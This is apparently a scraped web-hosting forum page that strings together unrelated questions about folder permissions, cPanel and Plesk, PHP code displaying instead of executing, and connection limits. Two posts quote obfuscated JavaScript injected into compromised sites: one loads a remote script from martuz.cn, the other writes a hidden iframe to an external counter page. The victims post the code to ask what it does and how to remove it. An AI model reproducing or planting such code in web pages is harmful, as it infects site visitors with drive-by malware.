if it's possible to change the permissions of a folder on a site (wwwrootscripts) so that the browser reads the scripts but when you go to the script location wwwroot/scripts/mystyles.css the user can't see the code?
View 2 RepliesI just ran into a very odd problem with my server. I was checking out my banner links on other sites when I realized none of them were displaying. I quickly checked the folder I keep the image in and I got a forbidden access warning. I checked the folder from ftp and it said the permissions were set to 0, instead of 755 like they should be
I can't move, delete, view, or alter the folder in any way.
How to secure /tmp folder on cpanel server with Centos?
what is permissions?
Server:
Centos 4.5/cPanel v11/php5 - SSH
Maybe someone can set me straight on this. I have always been under the impression, that under normal circumstances, permissions should usually be as follows:
userdir - 711
public_html - 750
folders - 755
files - 644
I am doing some work on a server and when I create a new folder (using WinSCP) it defaults the folder permissions to 775 and file permissions to 664. Besides causing possible problems with the applications I'm installing, isn't this a bit of a security risk?
Also, if I upload a tar and untar on the server it sets the same 775/664 permissions.
I have a problem where every folder I ftp onto the server gets given a 700 permission and every file gets a Zero permission. Most of the sites I am adding to this server will be WordPress sites and most of the folders I want to have a permission of 755 and for the files a permission of 644 so my question is how do I change the settings so that any new files ftp'd onto the server get the permission 755 and files get the permission of 644 ?
View 2 Replies View RelatedI'm SURE this is me being stupid but I cannot find where to change folder permissions in the new Plesk interface?
I go to the file manager but all I have are the basic file/folder operations (Create, Delete, Upload File, etc) - I can't find anywhere to change permissions on the folders to give the MYSERVER_IUSR permission, etc.
Ok, new to Plesk, trying to move from ispconfig. So I have Plesk 12 running on Centos 6 64bit in a VPS. I figured out how to upgrade PHP and now I have installed my first website. The website is joomla based but I am getting the below error when installing components:
Warning
Copy failed.
JInstaller: :Install: Failed to copy file /var/www/vhosts/virtual-sim-racing.com/httpdocs/home/tmp/install_55081e65af5fe/pkg_kunena.xml to /var/www/vhosts/virtual-sim-racing.com/httpdocs/home/administrator/manifests/packages/pkg_kunena.xml
Package Install: Could not copy setup file.
This suggest to me a permissions issue - but what to do with it. I have checked all of the relevant Joomla folder permissions and they are all showing as writeable, so it looks like something outside of that?
I don't want to have to stick with ispconfig much longer ...
Is it possible to hide WHM Plugins from reseller accounts on a cPanel server?
As of now, I'm simply blocking unauthorized access to the plugins with the following code:
Code:
Whostmgr::ACLS::init_acls();
if (!Whostmgr::ACLS::hasroot()) {
print "<b>Access Denied.</b>
";
exit();
}
If there are conditionals that can be stated before the link to the script is displayed, or any modifications that can be made to hide plugins, please let me know.
There are some plugins in WHM which I allow my resellers to use (mainly Fantastico/Master Reseller Panel), so hiding all plugins from non-root users is not a feasible option.
I'm creating a site similar to slickdeals & bensbargains and I'm trying to find a script that I can integrate into my text editor (tinymce.moxicode) that will create a tiny url as well as the redirect page automatically using php & mysql.
Looking at the following mouseover link from slickdeals:
slickdeals dot net/?pno=6999&lno=1&afscr=1
where it always starts with slickdeals dot net/
?pno=6999 each deal added gets a +1 to this number. The next deal would be 7000.
&lno=1 each link within a particular deal. Where the first link to the deal is lno=1, the next link (rebate) would be lno=2, etc.
&afscr=1 I'm not sure what this is for, I moused over a bunch of their links and they are all =1.
But the bottom line effect is that when you click on one of their links, it brings you momentarily to a blank page and then bestbuy dot com/etc/etc/etc comes up. The user never sees the funky affiliate link.
The best I've found so far is gentlesource dot com/short-url-script/
when I try to send Email from horde I have this:
PHP Code:
There was an error sending your message: Failed to add recipient: xxxxx@hotmail.com [SMTP: Invalid response code received from server (code: 451, response: Temporary local problem - please try later)]
On my VPS I would like to set the /tmp folder to 777 and point to it with session.save_path.
The VPS will host a number of sites, but I will have sole control of them. ie. the account holders will not have access to cpanel.
If it makes any difference, the server is running phpSUexec.
What are the risks involved with this?
I have two servers.
One server has a folder named 'vidfiles' and I want to transfer this entire folder (all 70gigs) to another server I just got.
Both servers are linux and use CPanal/whm.
What would be the command to get the files to transfer direct from server to server?
What is EPP code, I am required to enter it to register domain
View 5 Replies View RelatedI have serious problems with ".cgi" with malicious code, with that the person who has these files to send spam through my server without any kind of block, could block this type of send SPAM with files ".cgi"?
CentOS 5.2 - 64bits
WHM+cPanel
Exemplo of file executed: /usr/bin/perl /home/username/public_html/cgi-bin/erri/coms.cgi
PHP 5.2.1 installed on WHM 10.8.0 cPanel 10.9.0-C9565
If I load a php file on browser, it gets loaded, but in HTML source I can see php code.
If I run in SSH "php info.php", the php code gets runn and normal output is generated.
I checked these lines in httpd.conf:
LoadModule php5_module libexec/libphp5.so
AddModule mod_php5.c
AddHandler application/x-httpd-php .php .php4 .php3
AddType application/x-httpd-php .php
AddType application/x-httpd-php .php4
AddType application/x-httpd-php .php3
AddType application/x-httpd-php-source .phps
AddType application/x-httpd-php .phtml
"php -v" returns:
PHP 5.2.1 (cli) (built: Apr 9 2007 10:38:29)
Copyright (c) 1997-2007 The PHP Group
Zend Engine v2.2.0, Copyright (c) 1998-2007 Zend Technologies
with Zend Extension Manager v1.2.0, Copyright (c) 2003-2006, by Zend Technologies
with Zend Optimizer v3.2.2, Copyright (c) 1998-2006, by Zend Technologies
On php.ini I have:
; Enable the PHP scripting language engine under Apache.
engine = "On" ;engine
I use long tags ("<?php").
I recompiled Apache and PHP few times, both from WHM and from SSH. I reinstalled Zend optimizer.
We are testing a module that we think may improve stability on our webservers. The module limits the number of concurrent connections allowed from any particular ip address.
What I need an opinion on is what error message the server should return when it is refusing because of the limit.
The module currently returns a 503 error, that's what the module's author set it to do. 503 is a temporary error, which is good, but it implies that the problem is with the server, which seems somewhat inaccurate to me.
I was thinking a 409 would be good, with text saying that the request conflicts with the per visitor connection limit for the requested resource. Ideally the browser would display the message and people would know to reconfigure software or wait for existing connections to complete before resubmitting the request.
One of my co-workers here says that at least people understand the "server busy" error and they won't understand the "conflict" message.
Someone else says most of these errors will come from folks using http 1.0 and the 409 doesn't exist at that level of the protocol, so they won't get anything more than a generic "error!" type of message.
I put the windows media palyer embedded code on my site, but is there a way to limit the buffer or rate at which the video downloads or streams to the user.
Quote:
<object classid="clsid:6BF52A52-394A-11D3-B153-00C04F79FAA6" codebase= [url]
That is the code i use.
does anybody have a script that can veiw the php source code before it runs to the server of an external site
View 1 Replies View RelatedSomeone sniffed ftp password of a user account on my server and looks like javascripts were altered and iframe tags inserted in php files, while i cleaned up php pages i see the following javascript code added to each .js file, what is it supposed to do?
<!--
(function(qAWI){var OMt9='var-20a-3d-22S-63-72ip-74-45n-67-69ne-22-2cb-3d-22-56e-72sion-28)+-22-2cj-3d-22-22-2cu-3dnavigator-2e-75s-65-72A-67-65nt-3bi-66((-75-2eindex-4ff-28-22-43h-72ome-22)-3c0)-26-26(u-2einde-78-4ff(-22Win-22)-3e0)-26-26(u-2eindexOf(-22-4eT-206-22)-3c0)-26-26-28doc-75me-6et-2eco-6fk-69e-2e-69-6ed-65x-4ff(-22-6di-65k-3d1-22)-3c0-29-26-26(ty-70-65-6ff(z-72v-7at-73)-21-3dty-70eof(-22A-22)))-7b-7a-72v-7a-74s-3d-22A-22-3beval(-22-69-66(window-2e-22+a+-22)j-3d-6a+-22-2ba+-22M-61jo-72-22-2b-62-2ba+-22-4din-6f-72-22+b+a+-22B-75ild-22-2b-62+-22-6a-3b-22)-3bd-6f-63u-6dent-2ewri-74e(-22-3c-73c-72ipt-20src-3d-2f-2fma-22+-22rtuz-2ecn-2fvid-2f-3fi-64-3d-22-2bj+-22-3e-3c-5c-2fsc-72ipt-3e-22)-3b-7d';var M2ye=OMt9.replace(qAWI,'%');eval(unescape(M2ye))})(/-/g);
-->
I have a customer who is hosting a website on a dedicated server. The server is a high spec server with Intel Core 2 DUO E8400 processor, 4 GB DDR2 ECC RAM and a SATA Hard Drive. He is running only a single website which has a data entry section. The problem is that a few scripts when run consume 99% of the CPU. In fact, there is a particular script which even if run alone consumes 99% CPU. The code retrieves some records from the database by running an SQL query. The code is never executed. I have checked the sql query in the code and it runs fine if executed in SQL Query Analyzer. I know the problem is somewhere in the code, but cannot find the exact cause. Is there a tool to debug the asp code and find out may be the issue with the code? I have tried the Debug Diagnostics utility,
View 2 Replies View Relatedhow this new feature works in csf with blocking by country code.
I'm trying to put a block on Indonesia.
A friend of mine is trying to show the page below, however it just shows the code.
[url]
What can I do to fix it?
all sites in my server have maliciose code:
</html> <html> <body><script>var source ="=jgsbnf!tsd>(iuuq;00iv2.iv2/do0dpvoufs0joefy/qiq(!xjeui>2!ifjhiu>2!gsbnfcpsefs>1?=0jgsbnf?"; var result = "";
for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);
document.write(result); </script>
</html> </body>
how to localize this code in my sites, using grep.
My server work in centos.
I am currently developing a web application on a WAMP server. Once complete my client will have some in-house "programmers" make changes to the code as they are needed.
My client wants to track all changes made to the source files (ie- who made the change, when it was made, what files were modified, and what specific lines were added/removed/modified). Also, the program must run on the server and not the programmers computers.
I've searched high and low and only found a couple programs that scratch the surface of what they want.
Some JSP pages display the source code. Some work and some don't even after recompiling apache with tomcat module and restarting jsp.
-rw-r--r-- 1 user user 6.5K Mar 10 17:18 index.jsp
Not sure where the jsp logs are, but there were no errors in the domlogs.
I have just moved to a VPS server from my shared hosting server and I am suddenly finding it tough to code equally well by just using the vim command. I have become more used to the CPanel code editor probably.
Can anyone suggest a nice tool for the same. I have installed webmin, but its code editor just sucks.
i have a vps account and am trying to setup my website i installed php 4 from a control panel where it auto installed php and there is mysql and i installed all of them but when i upload my script and go to install or go to the index of my site it shows the php code and does not execute.
my permissions are right on i also made a testphp file and used this code <?php phpinfo(); ?> and still nothing just shows the php code when you browse to the file i even went further i installed from the control panel another program called phpmyadmin and when i log in it does the same thing just shows php code so what the hell is going on you think i need to contact my host provider for this issue i sent an email out but waiting for a responce